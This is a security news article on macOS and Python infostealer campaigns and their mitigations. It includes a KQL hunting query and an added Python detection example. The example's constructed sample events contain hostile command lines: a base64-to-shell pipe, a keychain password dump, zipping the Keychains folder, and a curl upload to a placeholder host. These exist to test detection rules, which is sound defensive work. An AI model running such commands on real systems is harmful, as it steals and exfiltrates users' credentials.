Categories: Cyber Security News

macOS Targeted as Infostealer Attacks Abuse Python and Trusted Services

Infostealer malware is spreading fast beyond Windows, now hitting macOS hard. Attackers use Python code and trusted apps to steal credentials quietly.

Since late 2025, Microsoft Defender Experts have spotted macOS campaigns that rely on fake sites, ClickFix tricks, and malicious DMG files.

These drop stealers such as DigitStealer, MacSync, and Atomic macOS Stealer (AMOS). The malware runs filelessly, abuses built-in macOS tools, and grabs browser data, keychains, and developer secrets via AppleScript.

Python stealers let attackers adapt code quickly for any OS. Others hijack WhatsApp and PDF tools to push malware such as Eternidade Stealer, which targets bank logins and crypto wallets. Stolen data leads to account takeover, financial loss, and business compromise.

macOS Tricks, Python Phishing, and App Abuse

Mac users face fake Google Ads and sites pushing malicious downloads or Terminal commands. ClickFix scams trick victims into pasting code that installs DigitStealer (via fake DynamicLake apps), MacSync (Terminal pastes), or AMOS (fake AI tools).

All three harvest browser passwords, crypto wallets, cloud keys, and developer tokens, then zip the data and send it to attacker servers before cleaning up.

Python stealers like PXA surged in 2025, tied to Vietnamese actors hitting governments via phishing. They use Telegram for C2, obfuscated scripts, DLL sideloading, and fake svchost.exe processes.

Campaigns in October and December set persistence with Run keys or scheduled tasks and exfiltrate data via Telegram.

Attackers abuse WhatsApp for worm-like spread. A November 2025 campaign starts with VBS dropping batch files and PowerShell.

It grabs contacts, sends malicious messages, and drops Eternidade Stealer via an MSI installer. This Delphi-based stealer watches for banking and crypto sites such as Bradesco, Binance, and MetaMask.

A September Crystal PDF scam used malvertising. The fake PDF editor sets scheduled tasks for persistence and steals Chrome and Firefox cookies and session data from AppData.

Mitigations, Detections, and IOCs

Counter these with user training on fake installers and the risk of pasting commands into Terminal. Monitor Terminal for curl, base64, gunzip, and osascript chains. Flag Keychain access, ZIP archives created in /tmp, and unusual POST requests to newly seen domains.

Use Microsoft Defender XDR: cloud protection, EDR block mode, network/web guards, SmartScreen, auto-remediation, tamper protection. Attack surface rules block obfuscated scripts, untrusted executables, JS/VBS downloads.

Defender spots execution (PowerShell curls, osascript), persistence (Run keys, LaunchAgents), evasion (DLL side-loading, certutil), credential grabs, discovery (WMI/Python), C2, collection (ZIPs), exfil (curl).

Hunt with queries like this one for DigitStealer:

// Suspicious DMG mounting
DeviceProcessEvents
| where FileName has_any ('mount_hfs', 'mount')
| where ProcessCommandLine has_all ('-o nodev', '-o quarantine')
| where ProcessCommandLine contains '/Volumes/Install DynamicLake'

Similar KQL queries cover MacSync curl downloads, AMOS DMG mounts, PXA fake svchost.exe processes, WhatsApp VBS droppers, and Crystal PDF scheduled tasks.
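The mount query above and the Terminal behaviours listed under Mitigations, expressed as runnable detection logic over constructed process events (an added example, not code from Microsoft or the article). The FileName and ProcessCommandLine field names are real DeviceProcessEvents columns; the rule substrings, regexes and sample command lines are assumptions.

```python
import re
from typing import Callable, Dict, List, Set, Tuple

Event = Dict[str, str]  # one row shaped like Defender's DeviceProcessEvents

# Rule = (name, FileName values it applies to, predicate over ProcessCommandLine).
# The first rule mirrors the DMG-mount KQL above; the rest encode the Terminal
# behaviours the text says to watch for. Substrings and regexes are assumptions.
RULES: List[Tuple[str, Set[str], Callable[[str], bool]]] = [
    ("dmg_quarantine_mount", {"mount_hfs", "mount"},
     lambda c: "-o nodev" in c and "-o quarantine" in c
     and "/Volumes/Install DynamicLake" in c),
    ("shell_decode_chain", {"bash", "sh", "zsh"},
     lambda c: re.search(r"base64\s+(-d|-D|--decode)", c) is not None
     and re.search(r"\|\s*(gunzip|sh|bash)\b", c) is not None),
    ("keychain_access", {"osascript", "security"},
     lambda c: re.search(r"keychain|find-(generic|internet)-password", c, re.I) is not None),
    ("tmp_archive", {"zip", "ditto", "tar"},
     lambda c: re.search(r"/tmp/\S+\.zip", c) is not None),
    ("curl_upload", {"curl"},
     lambda c: re.search(r"(^|\s)(-X\s*POST|--data\S*|-d|-F|-T|--upload-file)\s", c) is not None),
]

# Constructed sample telemetry (not captured data): five suspicious rows and two
# ordinary-looking ones that the rules must leave alone.
SAMPLE_EVENTS: List[Event] = [
    {"FileName": "mount_hfs", "ProcessCommandLine":
     "mount_hfs -o nodev -o quarantine /dev/disk2s1 '/Volumes/Install DynamicLake'"},
    {"FileName": "bash", "ProcessCommandLine":
     "bash -c 'echo aGVsbG8= | base64 -d | gunzip | sh'"},
    {"FileName": "osascript", "ProcessCommandLine":
     "osascript -e 'do shell script \"security find-generic-password -ga Chrome\"'"},
    {"FileName": "zip", "ProcessCommandLine": "zip -r /tmp/out.zip /Users/me/Library/Keychains"},
    {"FileName": "curl", "ProcessCommandLine":
     "curl -s -X POST -d @/tmp/out.zip https://example.invalid/upload"},
    {"FileName": "curl", "ProcessCommandLine": "curl -fsSL https://example.invalid/install.sh"},
    {"FileName": "mount", "ProcessCommandLine": "mount -t apfs /dev/disk3s1 /Volumes/Data"},
]

def hunt(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule name, command line) for every event that matches a rule."""
    hits: List[Tuple[str, str]] = []
    for ev in events:
        for rule, files, pred in RULES:
            if ev["FileName"] in files and pred(ev["ProcessCommandLine"]):
                hits.append((rule, ev["ProcessCommandLine"]))
    return hits
```

Running `hunt(SAMPLE_EVENTS)` flags the five staged rows in order and leaves the plain script download and the APFS mount alone; in practice the rules would be fed from an EDR export rather than the inline list.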

Key IOCs (samples):


Check Threat Analytics for MacSync and Crystal PDF intelligence. Organizations should scan now, as these cross-platform stealers blend in and evade older defenses.


The post macOS Targeted as Infostealer Attacks Abuse Python and Trusted Services appeared first on Cyber Security News.
